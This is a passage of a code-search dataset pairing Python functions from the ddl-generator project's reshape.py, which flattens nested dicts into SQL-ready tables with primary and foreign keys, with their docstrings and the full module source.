child_fk_names[child_name] = fk_name
for row in parent:
if child_name in row:
for child in row[child_name]:
child[fk_name] = row[parent.pk.name]
children[child_name].append(child)
row.pop(child_name)
# TODO: What if rows have a mix of scalar / list / dict types?
return (parent, parent.pk.name if parent.pk else None, children, child_fk_names)
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/reshape.py | walk_and_clean | python | def walk_and_clean(data):
# transform namedtuples to OrderedDicts
if hasattr(data, '_fields'):
data = OrderedDict((k,v) for (k,v) in zip(data._fields, data))
# Recursively clean up child dicts and lists
if hasattr(data, 'items') and hasattr(data, '__setitem__'):
for (key, val) in data.items():
data[key] = walk_and_clean(val)
elif isinstance(data, list) or isinstance(data, tuple) \
or hasattr(data, '__next__') or hasattr(data, 'next'):
data = [walk_and_clean(d) for d in data]
# Clean up any keys in this dict itself
if hasattr(data, 'items'):
original_keys = data.keys()
tup = ((clean_key_name(k), v) for (k, v) in data.items())
data = OrderedDict(tup)
if len(data) < len(original_keys):
raise KeyError('Cleaning up %s created duplicates' %
original_keys)
return data | Recursively walks list of dicts (which may themselves embed lists and dicts),
transforming namedtuples to OrderedDicts and
using ``clean_key_name(k)`` to make keys into SQL-safe column names
>>> data = [{'a': 1}, [{'B': 2}, {'B': 3}], {'F': {'G': 4}}]
>>> pprint(walk_and_clean(data))
[OrderedDict([('a', 1)]),
[OrderedDict([('b', 2)]), OrderedDict([('b', 3)])],
OrderedDict([('f', OrderedDict([('g', 4)]))])] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L36-L67 | [
"def walk_and_clean(data):\n \"\"\"\n Recursively walks list of dicts (which may themselves embed lists and dicts),\n transforming namedtuples to OrderedDicts and\n using ``clean_key_name(k)`` to make keys into SQL-safe column names\n\n >>> data = [{'a': 1}, [{'B': 2}, {'B': 3}], {'F': {'G': 4}}]\n ... | #!/usr/bin/python
# -*- coding: utf8
import logging
from collections import OrderedDict, namedtuple, defaultdict
import doctest
from hashlib import md5
import hashlib
import copy
from pprint import pprint
from ddlgenerator.reserved import sql_reserved_words
import re
try:
import ddlgenerator.typehelpers as th
except ImportError:
import typehelpers as th # TODO: can py2/3 split this
_illegal_in_column_name = re.compile(r'[^a-zA-Z0-9_$#]')
def clean_key_name(key):
"""
Makes ``key`` a valid and appropriate SQL column name:
1. Replaces illegal characters in column names with ``_``
2. Prevents name from beginning with a digit (prepends ``_``)
3. Lowercases name. If you want case-sensitive table
or column names, you are a bad person and you should feel bad.
"""
result = _illegal_in_column_name.sub("_", key.strip())
if result[0].isdigit():
result = '_%s' % result
if result.upper() in sql_reserved_words:
result = '_%s' % key
return result.lower()
def _id_fieldname(fieldnames, table_name = ''):
"""
Finds the field name from a dict likeliest to be its unique ID
>>> _id_fieldname({'bar': True, 'id': 1}, 'foo')
'id'
>>> _id_fieldname({'bar': True, 'foo_id': 1, 'goo_id': 2}, 'foo')
'foo_id'
>>> _id_fieldname({'bar': True, 'baz': 1, 'baz_id': 3}, 'foo')
"""
templates = ['%s_%%s' % table_name, '%s', '_%s']
for stub in ['id', 'num', 'no', 'number']:
for t in templates:
if t % stub in fieldnames:
return t % stub
class UniqueKey(object):
"""
Provides unique IDs.
>>> idp1 = UniqueKey('id', int, max=4)
>>> idp1.next()
5
>>> idp1.next()
6
>>> idp2 = UniqueKey('id', str)
>>> id2 = idp2.next()
>>> (len(id2), type(id2))
(32, <class 'str'>)
"""
def __init__(self, key_name, key_type, max=0):
self.name = key_name
if key_type != int and not hasattr(key_type, 'lower'):
raise NotImplementedError("Primary key field %s is %s, must be string or integer"
% (key_name, key_type))
self.type = key_type
self.max = max
def next(self):
if self.type == int:
self.max += 1
return self.max
else:
return md5().hexdigest()
def unnest_child_dict(parent, key, parent_name=''):
    """
    If ``parent`` dictionary has a ``key`` whose ``val`` is a dict,
    unnest ``val``'s fields into ``parent`` and remove ``key``.

    >>> parent = {'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140}}
    >>> unnest_child_dict(parent, 'capital', 'provinces')
    >>> pprint(parent)
    {'capital_name': 'Québec City', 'capital_pop': 491140, 'province': 'Québec'}
    >>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City', 'pop': 491140}}
    >>> unnest_child_dict(parent, 'capital', 'provinces')
    >>> pprint(parent)
    {'capital_id': 1,
     'capital_name': 'Québec City',
     'capital_pop': 491140,
     'province': 'Québec'}
    >>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City'}}
    >>> unnest_child_dict(parent, 'capital', 'provinces')
    >>> pprint(parent)
    {'capital': 'Québec City', 'province': 'Québec'}
    """
    val = parent[key]
    name = "%s['%s']" % (parent_name, key)
    logging.debug("Unnesting dict %s" % name)
    id = _id_fieldname(val, parent_name)
    if id:
        logging.debug("%s is %s's ID" % (id, key))
        if len(val) <= 2:
            # An ID plus at most one other field carries no information of
            # its own; drop the ID column before flattening.
            logging.debug('Removing ID column %s.%s' % (key, id))
            val.pop(id)
    if len(val) == 0:
        logging.debug('%s is empty, removing from %s' % (name, parent_name))
        parent.pop(key)
        return
    elif len(val) == 1:
        # A single remaining value collapses to a scalar under ``key``.
        logging.debug('Nested one-item dict in %s, making scalar.' % name)
        parent[key] = list(val.values())[0]
        return
    else:
        # Push each child field up as ``<key>_<childfield>``.
        logging.debug('Pushing all fields from %s up to %s' % (name, parent_name))
        new_field_names = ['%s_%s' % (key, child_key.strip('_')) for child_key in val]
        # BUG FIX: ``set(id or [])`` built a set of the id string's
        # *characters*, so the id field was never actually excluded from
        # the overlap check.  Use the id as a single set element.
        overlap = (set(new_field_names) & set(parent)) - ({id} if id else set())
        if overlap:
            # BUG FIX: the original passed four arguments to a format
            # string with three ``%s`` placeholders, raising TypeError on
            # this error path instead of logging.
            logging.error("Could not unnest child %s; %s present in %s"
                          % (name, ','.join(overlap), parent_name))
            return
        for (child_key, child_val) in val.items():
            new_field_name = '%s_%s' % (key, child_key.strip('_'))
            parent[new_field_name] = child_val
        parent.pop(key)
# Sample nested rows -- provinces with an embedded ``capital`` dict and a
# ``cities`` list -- shared by the doctests below (e.g. ParentTable's).
_sample_data = [{'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140},
                 'id': 1, 'province_id': 1,
                 'cities': [{'name': 'Montreal', 'pop': 1649519}, {'name': 'Laval', 'pop': 401553}]},
                {'province': 'Ontario', 'capital': {'name': 'Toronto', 'pop': 2615060}, 'province_id': 2,
                 'cities': [{'name': 'Ottawa', 'pop': 883391}, {'name': 'Missisauga', 'pop': 713443}]},
                {'province': 'New Brunswick', 'capital': {'name': 'Fredricton', 'pop': 56224},
                 'id': 3, 'province_id': 3,
                 'cities': [{'name': 'Saint John', 'pop': 70063}, {'name': 'Moncton', 'pop': 69074}]},
                ]
def all_values_for(data, field_name):
    """Collect ``field_name``'s value from every row of ``data`` that has it.

    Rows lacking the field are skipped entirely (rather than contributing
    ``None``), so the result length equals the number of rows defining it.
    """
    values = []
    for row in data:
        if field_name in row:
            values.append(row.get(field_name))
    return values
def unused_field_name(data, preferences):
    """
    Return the first name in ``preferences`` absent from every row of ``data``.

    Args:
        data: iterable of dict-like rows
        preferences: candidate field names, most preferred first

    Raises:
        KeyError: if every preferred name already appears in some row.
    """
    for pref in preferences:
        if not any(pref in row for row in data):
            return pref
    # BUG FIX: the original raised with ``self.name``, a NameError in this
    # module-level function; report the exhausted candidate list instead.
    raise KeyError("All desired names already taken: %s" % ', '.join(preferences))
class ParentTable(list):
    """
    List of ``dict``s that knows (or creates) its own primary key field.

    >>> provinces = ParentTable(_sample_data, 'province', pk_name='province_id')
    >>> provinces.pk.name
    'province_id'
    >>> [p[provinces.pk.name] for p in provinces]
    [1, 2, 3]
    >>> provinces.pk.max
    3

    Now if province_id is unusable because it's nonunique:

    >>> data2 = copy.deepcopy(_sample_data)
    >>> for row in data2: row['province_id'] = 4
    >>> provinces2 = ParentTable(data2, 'province', pk_name='id', force_pk=True)
    >>> provinces2.pk.name
    'id'
    >>> [p[provinces2.pk.name] for p in provinces2]
    [1, 4, 3]
    """
    def is_in_all_rows(self, value):
        # True when every row has a *truthy* value for ``value``
        # (a row with value=None/0/'' counts as missing).
        return len([1 for r in self if r.get(value)]) == len(self)
    def __init__(self, data, singular_name, pk_name=None, force_pk=False):
        """
        Args:
            data: list of dict-like rows
            singular_name: singular table name (used to derive pk/fk names)
            pk_name: preferred primary-key field name, if any
            force_pk: assign a primary key even if ``pk_name`` is not
                already present in every row
        """
        self.name = singular_name
        super(ParentTable, self).__init__(data)
        self.pk_name = pk_name
        # Assign a PK eagerly only when forced or when the requested name
        # already appears (truthy) in every row; otherwise defer --
        # unnest_children() calls assign_pk() later if children need it.
        if force_pk or (self.pk_name and self.is_in_all_rows(self.pk_name)):
            self.assign_pk()
        else:
            self.pk = None
    def suitability_as_key(self, key_name):
        """
        Judge whether ``key_name`` can serve as this table's primary key.

        Returns: (result, key_type)

        ``result`` is True, False, or 'absent' or 'partial' (both still usable)
        ``key_type`` is ``int`` for integer keys or ``str`` for hash keys
        """
        pk_values = all_values_for(self, key_name)
        if not pk_values:
            return ('absent', int) # could still use it
        # Infer the key type from the most specific type all existing
        # values can be coerced to.
        key_type = type(th.best_coercable(pk_values))
        num_unique_values = len(set(pk_values))
        if num_unique_values < len(pk_values):
            return (False, None) # non-unique
        if num_unique_values == len(self):
            return (True, key_type) # perfect!
        return ('partial', key_type) # unique, but some rows need populating
    def use_this_pk(self, pk_name, key_type):
        # Build the key generator.  For integer keys, seed the counter with
        # the current maximum so newly generated values don't collide.
        if key_type == int:
            self.pk = UniqueKey(pk_name, key_type, max([0, ] + all_values_for(self, pk_name)))
        else:
            self.pk = UniqueKey(pk_name, key_type)
    def assign_pk(self):
        """
        Choose or invent this table's primary key and fill in missing values.

        Raises an Exception when the requested key field holds duplicates.
        """
        if not self.pk_name:
            # No key requested; derive one from the table name.
            self.pk_name = '%s_id' % self.name
            logging.warning('Primary key %s.%s not requested, but nesting demands it'
                            % (self.name, self.pk_name))
        (suitability, key_type) = self.suitability_as_key(self.pk_name)
        if not suitability:
            raise Exception('Duplicate values in %s.%s, unsuitable primary key'
                            % (self.name, self.pk_name))
        self.use_this_pk(self.pk_name, key_type)
        if suitability in ('absent', 'partial'):
            # Populate rows that lack a key value.
            for row in self:
                if self.pk_name not in row:
                    row[self.pk_name] = self.pk.next()
def unnest_children(data, parent_name='', pk_name=None, force_pk=False):
    """
    For each ``key`` in each row of ``data`` (which must be a list of dicts),
    unnest any dict values into ``parent``, and remove list values into separate lists.

    Return (``data``, ``pk_name``, ``children``, ``child_fk_names``) where

    ``data``
        the transformed input list

    ``pk_name``
        field name of ``data``'s (possibly new) primary key

    ``children``
        a defaultdict(list) of data extracted from child lists

    ``child_fk_names``
        dict of the foreign key field name in each child
    """
    # Candidate FK names, most preferred first; the parent's own pk-derived
    # name (when given) takes priority over the generic fallbacks.
    possible_fk_names = ['%s_id' % parent_name, '_%s_id' % parent_name, 'parent_id', ]
    if pk_name:
        possible_fk_names.insert(0, '%s_%s' % (parent_name, pk_name.strip('_')))
    children = defaultdict(list)
    field_names_used_by_children = defaultdict(set)
    child_fk_names = {}
    parent = ParentTable(data, parent_name, pk_name=pk_name, force_pk=force_pk)
    # Pass 1: flatten nested dicts in place, normalize list items to dicts,
    # and record which field names each child list already uses.
    for row in parent:
        try:
            for (key, val) in row.items():
                if hasattr(val, 'items'):
                    unnest_child_dict(parent=row, key=key, parent_name=parent_name)
                elif isinstance(val, list) or isinstance(val, tuple):
                    # force listed items to be dicts, not scalars
                    row[key] = [v if hasattr(v, 'items') else {key: v} for v in val]
        except AttributeError:
            # row.items() failed -- the row was not a dict at all.
            raise TypeError('Each row should be a dictionary, got %s: %s' % (type(row), row))
        for (key, val) in row.items():
            if isinstance(val, list) or isinstance(val, tuple):
                for child in val:
                    field_names_used_by_children[key].update(set(child.keys()))
    # Pass 2: for each child list, pick an FK name no child row already
    # uses, stamp the parent's PK onto each child, and extract the children.
    for (child_name, names_in_use) in field_names_used_by_children.items():
        if not parent.pk:
            # Children need something to point at -- create the PK lazily.
            parent.assign_pk()
        for fk_name in possible_fk_names:
            if fk_name not in names_in_use:
                break
        else:
            # for/else: no break -> every candidate name was taken.
            raise Exception("Cannot find unused field name in %s.%s to use as foreign key"
                            % (parent_name, child_name))
        child_fk_names[child_name] = fk_name
        for row in parent:
            if child_name in row:
                for child in row[child_name]:
                    child[fk_name] = row[parent.pk.name]
                    children[child_name].append(child)
                row.pop(child_name)
    # TODO: What if rows have a mix of scalar / list / dict types?
    return (parent, parent.pk.name if parent.pk else None, children, child_fk_names)
if __name__ == '__main__':
    # Run this module's doctests; NORMALIZE_WHITESPACE lets the expected
    # output in the docstrings wrap without failing on layout differences.
    doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/reshape.py | _id_fieldname | python | def _id_fieldname(fieldnames, table_name = ''):
templates = ['%s_%%s' % table_name, '%s', '_%s']
for stub in ['id', 'num', 'no', 'number']:
for t in templates:
if t % stub in fieldnames:
return t % stub | Finds the field name from a dict likeliest to be its unique ID
>>> _id_fieldname({'bar': True, 'id': 1}, 'foo')
'id'
>>> _id_fieldname({'bar': True, 'foo_id': 1, 'goo_id': 2}, 'foo')
'foo_id'
>>> _id_fieldname({'bar': True, 'baz': 1, 'baz_id': 3}, 'foo') | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L69-L83 | null | #!/usr/bin/python
# -*- coding: utf8
import logging
from collections import OrderedDict, namedtuple, defaultdict
import doctest
from hashlib import md5
import hashlib
import copy
from pprint import pprint
from ddlgenerator.reserved import sql_reserved_words
import re
try:
import ddlgenerator.typehelpers as th
except ImportError:
import typehelpers as th # TODO: can py2/3 split this
_illegal_in_column_name = re.compile(r'[^a-zA-Z0-9_$#]')
def clean_key_name(key):
"""
Makes ``key`` a valid and appropriate SQL column name:
1. Replaces illegal characters in column names with ``_``
2. Prevents name from beginning with a digit (prepends ``_``)
3. Lowercases name. If you want case-sensitive table
or column names, you are a bad person and you should feel bad.
"""
result = _illegal_in_column_name.sub("_", key.strip())
if result[0].isdigit():
result = '_%s' % result
if result.upper() in sql_reserved_words:
result = '_%s' % key
return result.lower()
def walk_and_clean(data):
    """
    Recursively walks list of dicts (which may themselves embed lists and dicts),
    transforming namedtuples to OrderedDicts and
    using ``clean_key_name(k)`` to make keys into SQL-safe column names

    >>> data = [{'a': 1}, [{'B': 2}, {'B': 3}], {'F': {'G': 4}}]
    >>> pprint(walk_and_clean(data))
    [OrderedDict([('a', 1)]),
     [OrderedDict([('b', 2)]), OrderedDict([('b', 3)])],
     OrderedDict([('f', OrderedDict([('g', 4)]))])]
    """
    # transform namedtuples to OrderedDicts (``_fields`` marks a namedtuple)
    if hasattr(data, '_fields'):
        data = OrderedDict((k,v) for (k,v) in zip(data._fields, data))
    # Recursively clean up child dicts and lists
    if hasattr(data, 'items') and hasattr(data, '__setitem__'):
        for (key, val) in data.items():
            data[key] = walk_and_clean(val)
    elif isinstance(data, list) or isinstance(data, tuple) \
            or hasattr(data, '__next__') or hasattr(data, 'next'):
        # Lists, tuples, and iterators are all materialized into lists.
        data = [walk_and_clean(d) for d in data]
    # Clean up any keys in this dict itself
    if hasattr(data, 'items'):
        # ``original_keys`` is a live view of the *old* dict, so it keeps
        # its length after ``data`` is rebound to the new OrderedDict.
        original_keys = data.keys()
        tup = ((clean_key_name(k), v) for (k, v) in data.items())
        data = OrderedDict(tup)
        if len(data) < len(original_keys):
            # Two distinct keys cleaned to the same name -- refuse to
            # silently drop one of them.
            raise KeyError('Cleaning up %s created duplicates' %
                           original_keys)
    return data
class UniqueKey(object):
"""
Provides unique IDs.
>>> idp1 = UniqueKey('id', int, max=4)
>>> idp1.next()
5
>>> idp1.next()
6
>>> idp2 = UniqueKey('id', str)
>>> id2 = idp2.next()
>>> (len(id2), type(id2))
(32, <class 'str'>)
"""
def __init__(self, key_name, key_type, max=0):
self.name = key_name
if key_type != int and not hasattr(key_type, 'lower'):
raise NotImplementedError("Primary key field %s is %s, must be string or integer"
% (key_name, key_type))
self.type = key_type
self.max = max
def next(self):
if self.type == int:
self.max += 1
return self.max
else:
return md5().hexdigest()
def unnest_child_dict(parent, key, parent_name=''):
"""
If ``parent`` dictionary has a ``key`` whose ``val`` is a dict,
unnest ``val``'s fields into ``parent`` and remove ``key``.
>>> parent = {'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_name': 'Québec City', 'capital_pop': 491140, 'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_id': 1,
'capital_name': 'Québec City',
'capital_pop': 491140,
'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City'}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital': 'Québec City', 'province': 'Québec'}
"""
val = parent[key]
name = "%s['%s']" % (parent_name, key)
logging.debug("Unnesting dict %s" % name)
id = _id_fieldname(val, parent_name)
if id:
logging.debug("%s is %s's ID" % (id, key))
if len(val) <= 2:
logging.debug('Removing ID column %s.%s' % (key, id))
val.pop(id)
if len(val) == 0:
logging.debug('%s is empty, removing from %s' % (name, parent_name))
parent.pop(key)
return
elif len(val) == 1:
logging.debug('Nested one-item dict in %s, making scalar.' % name)
parent[key] = list(val.values())[0]
return
else:
logging.debug('Pushing all fields from %s up to %s' % (name, parent_name))
new_field_names = ['%s_%s' % (key, child_key.strip('_')) for child_key in val]
overlap = (set(new_field_names) & set(parent)) - set(id or [])
if overlap:
logging.error("Could not unnest child %s; %s present in %s"
% (name, key, ','.join(overlap), parent_name))
return
for (child_key, child_val) in val.items():
new_field_name = '%s_%s' % (key, child_key.strip('_'))
parent[new_field_name] = child_val
parent.pop(key)
_sample_data = [{'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140},
'id': 1, 'province_id': 1,
'cities': [{'name': 'Montreal', 'pop': 1649519}, {'name': 'Laval', 'pop': 401553}]},
{'province': 'Ontario', 'capital': {'name': 'Toronto', 'pop': 2615060}, 'province_id': 2,
'cities': [{'name': 'Ottawa', 'pop': 883391}, {'name': 'Missisauga', 'pop': 713443}]},
{'province': 'New Brunswick', 'capital': {'name': 'Fredricton', 'pop': 56224},
'id': 3, 'province_id': 3,
'cities': [{'name': 'Saint John', 'pop': 70063}, {'name': 'Moncton', 'pop': 69074}]},
]
def all_values_for(data, field_name):
return [row.get(field_name) for row in data if field_name in row]
def unused_field_name(data, preferences):
for pref in preferences:
if not all_values_for(data, pref):
return pref
raise KeyError("All desired names already taken in %s" % self.name)
class ParentTable(list):
"""
List of ``dict``s that knows (or creates) its own primary key field.
>>> provinces = ParentTable(_sample_data, 'province', pk_name='province_id')
>>> provinces.pk.name
'province_id'
>>> [p[provinces.pk.name] for p in provinces]
[1, 2, 3]
>>> provinces.pk.max
3
Now if province_id is unusable because it's nonunique:
>>> data2 = copy.deepcopy(_sample_data)
>>> for row in data2: row['province_id'] = 4
>>> provinces2 = ParentTable(data2, 'province', pk_name='id', force_pk=True)
>>> provinces2.pk.name
'id'
>>> [p[provinces2.pk.name] for p in provinces2]
[1, 4, 3]
"""
def is_in_all_rows(self, value):
return len([1 for r in self if r.get(value)]) == len(self)
def __init__(self, data, singular_name, pk_name=None, force_pk=False):
self.name = singular_name
super(ParentTable, self).__init__(data)
self.pk_name = pk_name
if force_pk or (self.pk_name and self.is_in_all_rows(self.pk_name)):
self.assign_pk()
else:
self.pk = None
def suitability_as_key(self, key_name):
"""
Returns: (result, key_type)
``result`` is True, False, or 'absent' or 'partial' (both still usable)
``key_type`` is ``int`` for integer keys or ``str`` for hash keys
"""
pk_values = all_values_for(self, key_name)
if not pk_values:
return ('absent', int) # could still use it
key_type = type(th.best_coercable(pk_values))
num_unique_values = len(set(pk_values))
if num_unique_values < len(pk_values):
return (False, None) # non-unique
if num_unique_values == len(self):
return (True, key_type) # perfect!
return ('partial', key_type) # unique, but some rows need populating
def use_this_pk(self, pk_name, key_type):
if key_type == int:
self.pk = UniqueKey(pk_name, key_type, max([0, ] + all_values_for(self, pk_name)))
else:
self.pk = UniqueKey(pk_name, key_type)
def assign_pk(self):
"""
"""
if not self.pk_name:
self.pk_name = '%s_id' % self.name
logging.warning('Primary key %s.%s not requested, but nesting demands it'
% (self.name, self.pk_name))
(suitability, key_type) = self.suitability_as_key(self.pk_name)
if not suitability:
raise Exception('Duplicate values in %s.%s, unsuitable primary key'
% (self.name, self.pk_name))
self.use_this_pk(self.pk_name, key_type)
if suitability in ('absent', 'partial'):
for row in self:
if self.pk_name not in row:
row[self.pk_name] = self.pk.next()
def unnest_children(data, parent_name='', pk_name=None, force_pk=False):
"""
For each ``key`` in each row of ``data`` (which must be a list of dicts),
unnest any dict values into ``parent``, and remove list values into separate lists.
Return (``data``, ``pk_name``, ``children``, ``child_fk_names``) where
``data``
the transformed input list
``pk_name``
field name of ``data``'s (possibly new) primary key
``children``
a defaultdict(list) of data extracted from child lists
``child_fk_names``
dict of the foreign key field name in each child
"""
possible_fk_names = ['%s_id' % parent_name, '_%s_id' % parent_name, 'parent_id', ]
if pk_name:
possible_fk_names.insert(0, '%s_%s' % (parent_name, pk_name.strip('_')))
children = defaultdict(list)
field_names_used_by_children = defaultdict(set)
child_fk_names = {}
parent = ParentTable(data, parent_name, pk_name=pk_name, force_pk=force_pk)
for row in parent:
try:
for (key, val) in row.items():
if hasattr(val, 'items'):
unnest_child_dict(parent=row, key=key, parent_name=parent_name)
elif isinstance(val, list) or isinstance(val, tuple):
# force listed items to be dicts, not scalars
row[key] = [v if hasattr(v, 'items') else {key: v} for v in val]
except AttributeError:
raise TypeError('Each row should be a dictionary, got %s: %s' % (type(row), row))
for (key, val) in row.items():
if isinstance(val, list) or isinstance(val, tuple):
for child in val:
field_names_used_by_children[key].update(set(child.keys()))
for (child_name, names_in_use) in field_names_used_by_children.items():
if not parent.pk:
parent.assign_pk()
for fk_name in possible_fk_names:
if fk_name not in names_in_use:
break
else:
raise Exception("Cannot find unused field name in %s.%s to use as foreign key"
% (parent_name, child_name))
child_fk_names[child_name] = fk_name
for row in parent:
if child_name in row:
for child in row[child_name]:
child[fk_name] = row[parent.pk.name]
children[child_name].append(child)
row.pop(child_name)
# TODO: What if rows have a mix of scalar / list / dict types?
return (parent, parent.pk.name if parent.pk else None, children, child_fk_names)
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/reshape.py | unnest_child_dict | python | def unnest_child_dict(parent, key, parent_name=''):
val = parent[key]
name = "%s['%s']" % (parent_name, key)
logging.debug("Unnesting dict %s" % name)
id = _id_fieldname(val, parent_name)
if id:
logging.debug("%s is %s's ID" % (id, key))
if len(val) <= 2:
logging.debug('Removing ID column %s.%s' % (key, id))
val.pop(id)
if len(val) == 0:
logging.debug('%s is empty, removing from %s' % (name, parent_name))
parent.pop(key)
return
elif len(val) == 1:
logging.debug('Nested one-item dict in %s, making scalar.' % name)
parent[key] = list(val.values())[0]
return
else:
logging.debug('Pushing all fields from %s up to %s' % (name, parent_name))
new_field_names = ['%s_%s' % (key, child_key.strip('_')) for child_key in val]
overlap = (set(new_field_names) & set(parent)) - set(id or [])
if overlap:
logging.error("Could not unnest child %s; %s present in %s"
% (name, key, ','.join(overlap), parent_name))
return
for (child_key, child_val) in val.items():
new_field_name = '%s_%s' % (key, child_key.strip('_'))
parent[new_field_name] = child_val
parent.pop(key) | If ``parent`` dictionary has a ``key`` whose ``val`` is a dict,
unnest ``val``'s fields into ``parent`` and remove ``key``.
>>> parent = {'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_name': 'Québec City', 'capital_pop': 491140, 'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_id': 1,
'capital_name': 'Québec City',
'capital_pop': 491140,
'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City'}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital': 'Québec City', 'province': 'Québec'} | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L113-L165 | [
"def _id_fieldname(fieldnames, table_name = ''):\n \"\"\"\n Finds the field name from a dict likeliest to be its unique ID\n\n >>> _id_fieldname({'bar': True, 'id': 1}, 'foo')\n 'id'\n >>> _id_fieldname({'bar': True, 'foo_id': 1, 'goo_id': 2}, 'foo')\n 'foo_id'\n >>> _id_fieldname({'bar': True,... | #!/usr/bin/python
# -*- coding: utf8
import logging
from collections import OrderedDict, namedtuple, defaultdict
import doctest
from hashlib import md5
import hashlib
import copy
from pprint import pprint
from ddlgenerator.reserved import sql_reserved_words
import re
try:
import ddlgenerator.typehelpers as th
except ImportError:
import typehelpers as th # TODO: can py2/3 split this
_illegal_in_column_name = re.compile(r'[^a-zA-Z0-9_$#]')
def clean_key_name(key):
"""
Makes ``key`` a valid and appropriate SQL column name:
1. Replaces illegal characters in column names with ``_``
2. Prevents name from beginning with a digit (prepends ``_``)
3. Lowercases name. If you want case-sensitive table
or column names, you are a bad person and you should feel bad.
"""
result = _illegal_in_column_name.sub("_", key.strip())
if result[0].isdigit():
result = '_%s' % result
if result.upper() in sql_reserved_words:
result = '_%s' % key
return result.lower()
def walk_and_clean(data):
"""
Recursively walks list of dicts (which may themselves embed lists and dicts),
transforming namedtuples to OrderedDicts and
using ``clean_key_name(k)`` to make keys into SQL-safe column names
>>> data = [{'a': 1}, [{'B': 2}, {'B': 3}], {'F': {'G': 4}}]
>>> pprint(walk_and_clean(data))
[OrderedDict([('a', 1)]),
[OrderedDict([('b', 2)]), OrderedDict([('b', 3)])],
OrderedDict([('f', OrderedDict([('g', 4)]))])]
"""
# transform namedtuples to OrderedDicts
if hasattr(data, '_fields'):
data = OrderedDict((k,v) for (k,v) in zip(data._fields, data))
# Recursively clean up child dicts and lists
if hasattr(data, 'items') and hasattr(data, '__setitem__'):
for (key, val) in data.items():
data[key] = walk_and_clean(val)
elif isinstance(data, list) or isinstance(data, tuple) \
or hasattr(data, '__next__') or hasattr(data, 'next'):
data = [walk_and_clean(d) for d in data]
# Clean up any keys in this dict itself
if hasattr(data, 'items'):
original_keys = data.keys()
tup = ((clean_key_name(k), v) for (k, v) in data.items())
data = OrderedDict(tup)
if len(data) < len(original_keys):
raise KeyError('Cleaning up %s created duplicates' %
original_keys)
return data
def _id_fieldname(fieldnames, table_name = ''):
"""
Finds the field name from a dict likeliest to be its unique ID
>>> _id_fieldname({'bar': True, 'id': 1}, 'foo')
'id'
>>> _id_fieldname({'bar': True, 'foo_id': 1, 'goo_id': 2}, 'foo')
'foo_id'
>>> _id_fieldname({'bar': True, 'baz': 1, 'baz_id': 3}, 'foo')
"""
templates = ['%s_%%s' % table_name, '%s', '_%s']
for stub in ['id', 'num', 'no', 'number']:
for t in templates:
if t % stub in fieldnames:
return t % stub
class UniqueKey(object):
"""
Provides unique IDs.
>>> idp1 = UniqueKey('id', int, max=4)
>>> idp1.next()
5
>>> idp1.next()
6
>>> idp2 = UniqueKey('id', str)
>>> id2 = idp2.next()
>>> (len(id2), type(id2))
(32, <class 'str'>)
"""
def __init__(self, key_name, key_type, max=0):
self.name = key_name
if key_type != int and not hasattr(key_type, 'lower'):
raise NotImplementedError("Primary key field %s is %s, must be string or integer"
% (key_name, key_type))
self.type = key_type
self.max = max
def next(self):
if self.type == int:
self.max += 1
return self.max
else:
return md5().hexdigest()
_sample_data = [{'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140},
'id': 1, 'province_id': 1,
'cities': [{'name': 'Montreal', 'pop': 1649519}, {'name': 'Laval', 'pop': 401553}]},
{'province': 'Ontario', 'capital': {'name': 'Toronto', 'pop': 2615060}, 'province_id': 2,
'cities': [{'name': 'Ottawa', 'pop': 883391}, {'name': 'Missisauga', 'pop': 713443}]},
{'province': 'New Brunswick', 'capital': {'name': 'Fredricton', 'pop': 56224},
'id': 3, 'province_id': 3,
'cities': [{'name': 'Saint John', 'pop': 70063}, {'name': 'Moncton', 'pop': 69074}]},
]
def all_values_for(data, field_name):
return [row.get(field_name) for row in data if field_name in row]
def unused_field_name(data, preferences):
for pref in preferences:
if not all_values_for(data, pref):
return pref
raise KeyError("All desired names already taken in %s" % self.name)
class ParentTable(list):
"""
List of ``dict``s that knows (or creates) its own primary key field.
>>> provinces = ParentTable(_sample_data, 'province', pk_name='province_id')
>>> provinces.pk.name
'province_id'
>>> [p[provinces.pk.name] for p in provinces]
[1, 2, 3]
>>> provinces.pk.max
3
Now if province_id is unusable because it's nonunique:
>>> data2 = copy.deepcopy(_sample_data)
>>> for row in data2: row['province_id'] = 4
>>> provinces2 = ParentTable(data2, 'province', pk_name='id', force_pk=True)
>>> provinces2.pk.name
'id'
>>> [p[provinces2.pk.name] for p in provinces2]
[1, 4, 3]
"""
def is_in_all_rows(self, value):
